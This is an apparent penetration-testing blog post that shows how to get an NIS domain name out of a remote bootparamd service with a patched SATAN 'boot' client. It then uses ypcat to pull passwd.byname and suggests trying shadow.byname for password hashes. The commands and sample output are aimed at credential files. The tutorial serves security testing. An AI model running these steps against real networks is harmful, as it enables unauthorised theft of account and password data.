Finding the NIS Domain Name from Bootparamd

NIS (Network Information Service) is not a particularly common protocol on modern internal networks. This is for good reason really consider its security weaknesses.  Its presense is often a gift to penetration testers (and probably hackers too).  This blog entry briefly documents one way that all important NIS Domain Name can be found remotely.

SATAN includes a nice little tool called “boot” which can remotely query the bootparamd service – often found running on the NIS server.  I tweaked this slightly so that it compiles under Linux (I’ve only tried it on Gentoo).  Download my hacked up copy here.

First locate a host that is running both ypserv and bootparamd.  This is invariably a Solaris host, but in this example it’s Debian:

$ rpcinfo -p 192.168.20.128
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp    749  status
    100024    1   tcp    752  status
    100004    2   udp   1017  ypserv
    100004    1   udp   1017  ypserv
    100004    2   tcp   1020  ypserv
    100004    1   tcp   1020  ypserv
    100009    1   udp   1020  yppasswdd
 600100069    1   udp   1022  fypxfrd
 600100069    1   tcp    600  fypxfrd
    100007    2   udp    605  ypbind
    100007    1   udp    605  ypbind
    100007    2   tcp    608  ypbind
    100007    1   tcp    608  ypbind
    100026    1   udp    603  bootparam

Now compile and run the bootparam client then query the bootparamd service.

$ tar xfz satan-bootparamd-client-ptm-patch.tar.gz
$ cd satan-bootparamd-client-ptm-patch
$ ls -l
total 12
-rw------- 1 ml ml  399 Jun 17 12:50 Makefile
-rw------- 1 ml ml 2461 Jun 17 12:50 boot.c
-rw------- 1 ml ml 3019 Jun 17 12:50 bootparam_prot.x
$ make

You need to supply the “boot” progam a client and server IP address.

$ ./boot
Usage: ./boot bootclient bootserver

In this example at least the server had to be set up specifically set up to serve a ficticious client (by editing /etc/bootparams).  If you get a message like the following, try a different client IP address:

$ ./boot 192.168.20.99 192.168.20.128
me: cannot contact bootparam server at 192.168.20.128 for 192.168.20.99: RPC: Timed out

A successful response will look like this:

$ ./boot 192.168.20.3 192.168.20.128
client_name: someclient
domain_name: mynisdom
router_addr: 192.168.20.128

Once you have the NIS Domain Name, you can grab the passwd file as follows:

$ ypcat -h 192.168.20.128 -d mynisdom passwd.byname
user:x:1000:1000:user,,,:/home/user:/bin/bash
ptm:x:1001:100::/home/ptm:

If you’re really lucky it’ll contain the password hashes too (also try to grab shadow.byname if it doesn’t).

If you’re unable to extract the NIS domain name from bootparamd, you could try querying other available services (FTP, SMTP, NFS, etc.) in order to find the DNS Domain name or some host names.   The NIS domain name could be similar to the DNS domain name, or to hostnames – but isn’t necessarily.  YMMV.

Tags: , , ,

Posted in Blog